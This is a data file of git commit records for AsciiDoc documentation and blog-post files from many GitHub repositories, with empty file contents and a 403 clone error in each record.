{"commit":"6a971f05d7cb7a908d27552a4cdc25e0c41e2dff","subject":"Doc : add HTTP headers documentation","message":"Doc : add HTTP headers documentation\n","repos":"alv-ch\/jobroom-api,alv-ch\/jobroom-api","old_file":"src\/docs\/asciidoc\/doc.adoc","new_file":"src\/docs\/asciidoc\/doc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alv-ch\/jobroom-api.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"64171245964da91c6ae4ffd24d8b14b4340d7f87","subject":"Update 2017-03-28-Instruction-Certification-amp-Royal-Arch-Degree.adoc","message":"Update 2017-03-28-Instruction-Certification-amp-Royal-Arch-Degree.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2017-03-28-Instruction-Certification-amp-Royal-Arch-Degree.adoc","new_file":"_posts\/2017-03-28-Instruction-Certification-amp-Royal-Arch-Degree.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"b831570d086e73a7c2f0046403c579061dc61422","subject":"Update 2016-11-13-Proof-by-Induction.adoc","message":"Update 2016-11-13-Proof-by-Induction.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-11-13-Proof-by-Induction.adoc","new_file":"_posts\/2016-11-13-Proof-by-Induction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"0297640d43bdb6aea6a9916a7aa6f313a1d16106","subject":"Update 2016-07-20-vim.adoc","message":"Update 2016-07-20-vim.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-20-vim.adoc","new_file":"_posts\/2016-07-20-vim.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"de00378f40c272db54e8bef4e15ae54b938da2d8","subject":"Delete the file at '_posts\/2017-05-28-Naming-Conventions.adoc'","message":"Delete the file at '_posts\/2017-05-28-Naming-Conventions.adoc'","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2017-05-28-Naming-Conventions.adoc","new_file":"_posts\/2017-05-28-Naming-Conventions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"5e3c12c83ab299ded98a2ebf90578b737f7e7bee","subject":"Update 2018-10-15-Firebase-Firestore.adoc","message":"Update 2018-10-15-Firebase-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-15-Firebase-Firestore.adoc","new_file":"_posts\/2018-10-15-Firebase-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"e62382195326ca90586427bb8378bdee5d12c501","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"010c8b56f433fecc913c8569785adea3ed5808a8","subject":"Update 2016-05-02-Notes-For-Setting-Up-Rails-Testing.adoc","message":"Update 2016-05-02-Notes-For-Setting-Up-Rails-Testing.adoc","repos":"caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io","old_file":"_posts\/2016-05-02-Notes-For-Setting-Up-Rails-Testing.adoc","new_file":"_posts\/2016-05-02-Notes-For-Setting-Up-Rails-Testing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/caryfitzhugh\/caryfitzhugh.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"1f082542375ef125b4a663b03bf5165f89e8cad2","subject":"y2b create post Google Chromecast Unboxing, First Look \\u0026 Test!","message":"y2b create post Google Chromecast Unboxing, First Look \\u0026 Test!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-07-25-Google-Chromecast-Unboxing-First-Look-u0026-Test.adoc","new_file":"_posts\/2013-07-25-Google-Chromecast-Unboxing-First-Look-u0026-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"68e3bffe7be1e86ba6ceceec10863d7df72e77cd","subject":"Update 2017-01-28-Markov.adoc","message":"Update 2017-01-28-Markov.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-01-28-Markov.adoc","new_file":"_posts\/2017-01-28-Markov.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"2cd111bf054f7e98cf4d34514214e488107385f3","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/11\/11\/deref.adoc","new_file":"content\/news\/2022\/11\/11\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"}
{"commit":"0527a4a5e312d1a7de3af106f60f4f50b2bd8b1b","subject":"Updated windows env set-up doc","message":"Updated windows env set-up doc","repos":"oskopek\/carcv,sk413025\/carcv,oskopek\/carcv,oskopek\/carcv,sk413025\/carcv,sk413025\/carcv,sk413025\/carcv,oskopek\/carcv,sk413025\/carcv,oskopek\/carcv,sk413025\/carcv,oskopek\/carcv","old_file":"docs\/howto-setup-environment-windows.adoc","new_file":"docs\/howto-setup-environment-windows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sk413025\/carcv.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"4468d1184f4d01332ad1d91ca64b9bcd4a2bfaa4","subject":"Update 2015-11-11-Episode-30-U-Interested-in-a-New-U-I.adoc","message":"Update 2015-11-11-Episode-30-U-Interested-in-a-New-U-I.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2015-11-11-Episode-30-U-Interested-in-a-New-U-I.adoc","new_file":"_posts\/2015-11-11-Episode-30-U-Interested-in-a-New-U-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"963cbbe0f240683edab785950720aa8ebac3e043","subject":"Update 2016-02-03-Attention-or-Retention-or-Protention.adoc","message":"Update 2016-02-03-Attention-or-Retention-or-Protention.adoc","repos":"jfavlam\/Concepts,jfavlam\/Concepts,jfavlam\/Concepts","old_file":"_posts\/2016-02-03-Attention-or-Retention-or-Protention.adoc","new_file":"_posts\/2016-02-03-Attention-or-Retention-or-Protention.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jfavlam\/Concepts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"ff8f60008585526f04d95e7568219d3e05a0884e","subject":"Update 2016-04-01-BREAKING-Disney-to-offer-Third-Shift-Magic-Hours.adoc","message":"Update 2016-04-01-BREAKING-Disney-to-offer-Third-Shift-Magic-Hours.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-04-01-BREAKING-Disney-to-offer-Third-Shift-Magic-Hours.adoc","new_file":"_posts\/2016-04-01-BREAKING-Disney-to-offer-Third-Shift-Magic-Hours.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c3376d1edb176496591e9a4e9260cc513fbd15e","subject":"Add a README to document how to generate the docs.wildfly.org web site.","message":"Add a README to document how to generate the docs.wildfly.org web site.\n","repos":"jstourac\/wildfly,tadamski\/wildfly,tadamski\/wildfly,rhusar\/wildfly,wildfly\/wildfly,xasx\/wildfly,rhusar\/wildfly,tadamski\/wildfly,wildfly\/wildfly,rhusar\/wildfly,wildfly\/wildfly,pferraro\/wildfly,jstourac\/wildfly,rhusar\/wildfly,iweiss\/wildfly,wildfly\/wildfly,pferraro\/wildfly,xasx\/wildfly,iweiss\/wildfly,jstourac\/wildfly,pferraro\/wildfly,jstourac\/wildfly,pferraro\/wildfly,iweiss\/wildfly,iweiss\/wildfly,xasx\/wildfly","old_file":"docs\/README.adoc","new_file":"docs\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wildfly\/wildfly.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"a77e73ef859126d4c01a03ee924806bf1df6ee50","subject":"Fix objectfilter link","message":"Fix objectfilter link","repos":"destijl\/artifacts,destijl\/artifacts,pidydx\/artifacts,pidydx\/artifacts","old_file":"docs\/Artifacts definition format and style guide.asciidoc","new_file":"docs\/Artifacts definition format and style guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pidydx\/artifacts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"85c0a96e182ed03d1ae4effcdba128797107e6ae","subject":"Create powered-by.adoc","message":"Create powered-by.adoc","repos":"incodehq\/contactapp,incodehq\/contactapp,incodehq\/contactapp,incodehq\/contactapp","old_file":"powered-by.adoc","new_file":"powered-by.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/incodehq\/contactapp.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ff2d57cc3694fab6c41217490b8ee46f780ffbe6","subject":"y2b create post Casio G-Shock G7900A-4 Red Unboxing \\u0026 Overview + Size Comparaison \\u0026 Close Ups!","message":"y2b create post Casio G-Shock G7900A-4 Red Unboxing \\u0026 Overview + Size Comparaison \\u0026 Close Ups!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-01-15-Casio-GShock-G7900A4-Red-Unboxing-u0026-Overview--Size-Comparaison-u0026-Close-Ups.adoc","new_file":"_posts\/2011-01-15-Casio-GShock-G7900A4-Red-Unboxing-u0026-Overview--Size-Comparaison-u0026-Close-Ups.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"775d5efeec1d55f3500567a0820f68733caa07ce","subject":"Added documentation on trouble-shooting tips","message":"Added documentation on trouble-shooting tips\n\nfixes 
#784\n","repos":"maksimu\/springfox,erikthered\/springfox,acourtneybrown\/springfox,namkee\/springfox,springfox\/springfox,arshadalisoomro\/springfox,acourtneybrown\/springfox,vmarusic\/springfox,RobWin\/springfox,cbornet\/springfox,zorosteven\/springfox,wjc133\/springfox,thomsonreuters\/springfox,springfox\/springfox,thomsonreuters\/springfox,jlstrater\/springfox,arshadalisoomro\/springfox,zhiqinghuang\/springfox,RobWin\/springfox,vmarusic\/springfox,yelhouti\/springfox,arshadalisoomro\/springfox,erikthered\/springfox,acourtneybrown\/springfox,cbornet\/springfox,thomsonreuters\/springfox,jlstrater\/springfox,springfox\/springfox,maksimu\/springfox,zhiqinghuang\/springfox,springfox\/springfox,zhiqinghuang\/springfox,kevinconaway\/springfox,yelhouti\/springfox,vmarusic\/springfox,zorosteven\/springfox,erikthered\/springfox,namkee\/springfox,wjc133\/springfox,yelhouti\/springfox,kevinconaway\/springfox,maksimu\/springfox,RobWin\/springfox,zorosteven\/springfox,wjc133\/springfox,jlstrater\/springfox,cbornet\/springfox,kevinconaway\/springfox,namkee\/springfox","old_file":"asciidoc\/common-problems.adoc","new_file":"asciidoc\/common-problems.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/springfox\/springfox.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9bbc0dccf98e812b25c7e5b13de471af2afeb515","subject":"Update 2002-02-02-NCMPCPP-on-OpenSUSE.adoc","message":"Update 2002-02-02-NCMPCPP-on-OpenSUSE.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2002-02-02-NCMPCPP-on-OpenSUSE.adoc","new_file":"_posts\/2002-02-02-NCMPCPP-on-OpenSUSE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"24a695bef64b7a64744e1e6d1555c56f80621318","subject":"Update 2016-5-13-Engineer-Career-Path.adoc","message":"Update 2016-5-13-Engineer-Career-Path.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-5-13-Engineer-Career-Path.adoc","new_file":"_posts\/2016-5-13-Engineer-Career-Path.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62f4792c0e48af7927c87de320b1268f5dc2163e","subject":"Update 2017-01-12-Vulnhub-la-serie-capitulo-uno-Leave-me-here.adoc","message":"Update 2017-01-12-Vulnhub-la-serie-capitulo-uno-Leave-me-here.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-12-Vulnhub-la-serie-capitulo-uno-Leave-me-here.adoc","new_file":"_posts\/2017-01-12-Vulnhub-la-serie-capitulo-uno-Leave-me-here.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"279ec393fc52f223dc8ff92dab2b2b09eedc50de","subject":"Update 
2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","message":"Update 2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","new_file":"_posts\/2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0dd03ac83a15ab3568220005e807d839b0be5834","subject":"y2b create post Ultimate Back To School Gadget Guide! (2013)","message":"y2b create post Ultimate Back To School Gadget Guide! (2013)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-08-22-Ultimate-Back-To-School-Gadget-Guide-2013.adoc","new_file":"_posts\/2013-08-22-Ultimate-Back-To-School-Gadget-Guide-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e61c728751d02539f7a6497952121379406b72ec","subject":"y2b create post The Best Keyboard Ever? (Das 4 Professional)","message":"y2b create post The Best Keyboard Ever? (Das 4 Professional)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-12-29-The-Best-Keyboard-Ever-Das-4-Professional.adoc","new_file":"_posts\/2014-12-29-The-Best-Keyboard-Ever-Das-4-Professional.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d15c83cff390f31ad0fe8feb655dcc35f5f8d7ec","subject":"Update 2015-01-31-Ruckblick-auf-den-5-Linux-Informationstag.adoc","message":"Update 2015-01-31-Ruckblick-auf-den-5-Linux-Informationstag.adoc","repos":"fraslo\/fraslo.github.io,fraslo\/fraslo.github.io,fraslo\/fraslo.github.io","old_file":"_posts\/2015-01-31-Ruckblick-auf-den-5-Linux-Informationstag.adoc","new_file":"_posts\/2015-01-31-Ruckblick-auf-den-5-Linux-Informationstag.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fraslo\/fraslo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aeeecea95c8a2f1ef561c349d8c5f408fd05b5ac","subject":"Update 2016-01-23-XML-Prague-2016.adoc","message":"Update 2016-01-23-XML-Prague-2016.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-XML-Prague-2016.adoc","new_file":"_posts\/2016-01-23-XML-Prague-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d30822e1e6245e19d501563483de0fb3ba382763","subject":"Update 2016-02-04-Hallo-from-Tekk.adoc","message":"Update 
2016-02-04-Hallo-from-Tekk.adoc","repos":"Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io","old_file":"_posts\/2016-02-04-Hallo-from-Tekk.adoc","new_file":"_posts\/2016-02-04-Hallo-from-Tekk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mentaxification\/Mentaxification.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bfda1ccfc0596d827d50d7c1b97da3c6f117b145","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e1caaa3a7fdb17e2dcb7426bfb32790c7bbf342","subject":"Update 2016-07-31-References-and-Values-and-Bears-Oh-My.adoc","message":"Update 2016-07-31-References-and-Values-and-Bears-Oh-My.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-07-31-References-and-Values-and-Bears-Oh-My.adoc","new_file":"_posts\/2016-07-31-References-and-Values-and-Bears-Oh-My.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d14d57cbe1f50fe8c7531159d8fc969e34f75b63","subject":"Update 2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","message":"Update 2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_file":"_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f2b68c8c1bfa1c3e9c9c18a7c517f410680820a","subject":"Update 2015-02-09-Test.adoc","message":"Update 2015-02-09-Test.adoc","repos":"ludolphus\/hubpress.io,ludolphus\/hubpress.io,ludolphus\/hubpress.io","old_file":"_posts\/2015-02-09-Test.adoc","new_file":"_posts\/2015-02-09-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ludolphus\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ef5d5aaf52546f7f5ec73c59af3b0c86274d88a","subject":"Update 03_task_exportDrawIo.adoc","message":"Update 03_task_exportDrawIo.adoc","repos":"docToolchain\/docToolchain,jakubjab\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain","old_file":"src\/docs\/manual\/03_task_exportDrawIo.adoc","new_file":"src\/docs\/manual\/03_task_exportDrawIo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docToolchain\/docToolchain.git\/': The requested URL returned 
error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b64f49bdd9ff420f7c6975d2d8d3d343d9c2467b","subject":"y2b create post Black Ops 2 Care Package GIVEAWAY!","message":"y2b create post Black Ops 2 Care Package GIVEAWAY!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-11-13-Black-Ops-2-Care-Package-GIVEAWAY.adoc","new_file":"_posts\/2012-11-13-Black-Ops-2-Care-Package-GIVEAWAY.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5204fcd884592d68e175c7e5bbb13759b80f5806","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e919766c38d209a6b23467e4582e4d6713715662","subject":"y2b create post You Wish You Got THIS For Christmas...","message":"y2b create post You Wish You Got THIS For Christmas...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-25-You%20Wish%20You%20Got%20THIS%20For%20Christmas....adoc","new_file":"_posts\/2017-12-25-You%20Wish%20You%20Got%20THIS%20For%20Christmas....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"987aa9eda57bfa8988961da1ca5216ce9b74e7dd","subject":"Update 2014-04-25-Nouveau-site-pour-la-fondation-Eclipse.adoc","message":"Update 2014-04-25-Nouveau-site-pour-la-fondation-Eclipse.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2014-04-25-Nouveau-site-pour-la-fondation-Eclipse.adoc","new_file":"_posts\/2014-04-25-Nouveau-site-pour-la-fondation-Eclipse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"59dc4130fcd71d4c5d1c9a9962ed1b1171391d44","subject":"JPA: documentation #150, #57","message":"JPA: documentation #150, #57\n","repos":"werval\/werval,werval\/werval,werval\/werval,werval\/werval","old_file":"org.qiweb.modules\/org.qiweb.modules.jpa\/src\/doc\/index.adoc","new_file":"org.qiweb.modules\/org.qiweb.modules.jpa\/src\/doc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/werval\/werval.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d472edf0280419dff6b3d556c7d34da7e4db11c0","subject":"added regressions","message":"added 
regressions\n","repos":"aim42\/htmlSanityCheckConsumer","old_file":"src\/docs\/asciidoc\/regressions.adoc","new_file":"src\/docs\/asciidoc\/regressions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aim42\/htmlSanityCheckConsumer.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fdc7f4c3eda8bbd82e757d9c8975480d9c88ad91","subject":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","message":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"987fbfae68447012d973cef0297be110165be542","subject":"Update 2017-03-22-Workflow-Needs-current-setup-text-processing.adoc","message":"Update 2017-03-22-Workflow-Needs-current-setup-text-processing.adoc","repos":"thomaszahr\/thomaszahr.github.io,thomaszahr\/thomaszahr.github.io,thomaszahr\/thomaszahr.github.io,thomaszahr\/thomaszahr.github.io","old_file":"_posts\/2017-03-22-Workflow-Needs-current-setup-text-processing.adoc","new_file":"_posts\/2017-03-22-Workflow-Needs-current-setup-text-processing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thomaszahr\/thomaszahr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ad891bd32d71790143725c5e2e4f9e56fd476290","subject":"Update 2017-06-20-How-to-Explain-Masonry-in-30-Seconds-or-Less.adoc","message":"Update 2017-06-20-How-to-Explain-Masonry-in-30-Seconds-or-Less.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2017-06-20-How-to-Explain-Masonry-in-30-Seconds-or-Less.adoc","new_file":"_posts\/2017-06-20-How-to-Explain-Masonry-in-30-Seconds-or-Less.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 